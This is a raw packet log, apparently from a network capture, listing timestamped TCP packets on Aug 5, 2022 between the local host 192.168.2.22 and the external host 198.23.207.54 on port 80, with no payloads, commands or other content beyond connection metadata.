Aug 5, 2022 16:36:15.183139086 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.183581114 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.295594931 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.295650959 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.295701027 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.295763969 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.295829058 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.295831919 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.295862913 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.295869112 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.295869112 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.295886040 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.295912027 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.295913935 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.295968056 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.295991898 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.296005964 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.296053886 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.296075106 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.296092033 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.296097040 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.296107054 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.296124935 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.296133041 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.296148062 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.296150923 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.296169996 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.296175003 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.296192884 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.296195030 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.296214104 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.296222925 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.296236992 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.296238899 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.296258926 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.296264887 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.296281099 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.296288013 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.296304941 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.296309948 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.296325922 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.296329975 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.296349049 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.296353102 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.296363115 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.296405077 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.296426058 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.296441078 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.296447992 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.296453953 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.296471119 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.296475887 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.296493053 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.296494961 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.296515942 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.296536922 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.296536922 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.296550035 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.296555042 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.296559095 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.296581984 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.296591997 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.296602011 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.296611071 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.296624899 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.296628952 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.296647072 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.296653986 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.296669006 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.296674013 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.296691895 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.296705008 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.296713114 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.296720982 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.296736002 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.296745062 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.296757936 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.296761990 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.296781063 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.296787024 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.296802998 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.296808004 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.296824932 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.296835899 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.296848059 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.296849966 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.296885014 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.296891928 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.297394991 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.297418118 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.297439098 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.297461987 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.297473907 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.297933102 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.297982931 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.306919098 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.411369085 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.411420107 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.411444902 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.411452055 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.411475897 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.411478996 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.411482096 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.411500931 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.411508083 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.411525011 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.411530018 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.411549091 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.411556959 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.411573887 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.411580086 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.411633968 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.423588037 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.423629045 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.423640013 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.423649073 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.423662901 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.423666954 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.423682928 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.423686028 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.423691988 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.423712015 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.423717022 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.423746109 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.423747063 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.423775911 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.423777103 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.423804998 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.423805952 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.423832893 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.423837900 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.423863888 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.423867941 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.423887014 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.423909903 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.423921108 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.423923969 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.423947096 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.423949003 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.423973083 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.423974991 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.424000978 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.424004078 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.424027920 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.424031019 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.424046040 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.424061060 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.424065113 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.424074888 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.424078941 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.424089909 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.424092054 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.424123049 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.424135923 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.424139023 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.424145937 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.424154043 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.424156904 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.424169064 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.424174070 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.424185038 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.424189091 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.424205065 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.424215078 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.424226999 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.424227953 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.424232006 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.424242973 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.424253941 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.424266100 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.424266100 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.424271107 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.424284935 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.424289942 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.424292088 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.424303055 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.424310923 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.424319029 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.424324036 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.424335003 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.424345970 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.424355984 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.424356937 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.424370050 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.424408913 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.424463034 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.425067902 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.529643059 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.529717922 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.529778004 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.529788017 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.529813051 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.529838085 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.529849052 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.529886007 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.529900074 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.529925108 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.529937983 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.529968023 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.529974937 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.530005932 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.530019045 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.530045033 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.530055046 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.530081987 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.530098915 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.530121088 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.530133963 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.530158997 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.530172110 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.530198097 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.530210972 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.530236006 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.530246019 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.530272961 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.530289888 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.530312061 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.530328035 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.530361891 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.540749073 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.540893078 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.540932894 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.540968895 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.541045904 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.541104078 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.541174889 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.541235924 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.541256905 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.541311026 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.541351080 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.541407108 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.541415930 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.541455984 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.541479111 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.541493893 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.541497946 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.541529894 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.541551113 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.541568995 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.541588068 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.541605949 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.541625023 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.541644096 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.541660070 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.541683912 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.541696072 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.541721106 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.541738033 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.541759014 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.541774988 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.541795969 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.541810989 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.541832924 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.541848898 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.541870117 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.541882992 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.541907072 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.541924953 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.541949034 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.541965961 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.541987896 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.542004108 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.542023897 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.542041063 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.542062044 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.542076111 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.542099953 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.542121887 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.542136908 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.542150021 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.542175055 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.542191982 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.542212009 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.542232037 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.542249918 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.542265892 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.542289019 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.542306900 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.542325974 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.542344093 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.542362928 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.542380095 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.542402029 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.542417049 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.542438030 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.542467117 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.542479992 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.542485952 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.542517900 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.542545080 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.542556047 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.542562008 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.542594910 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.542623043 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.542632103 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.542643070 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.542670012 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.542695045 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.542706966 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.542720079 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.542743921 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.542759895 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.542781115 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.542802095 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.542819023 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.542829990 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.542855978 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.542879105 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.542896986 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.542902946 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.542937040 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.542959929 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.542974949 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.542983055 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.543013096 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.543036938 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.543051004 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.543057919 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.543090105 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.543108940 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.543127060 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.543128967 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.543164968 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.543188095 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.543205023 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.543219090 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.543241024 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.543265104 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.543279886 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.543282986 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.543318987 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.543343067 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.543365955 CEST	49175	80	192.168.2.22	198.23.207.54
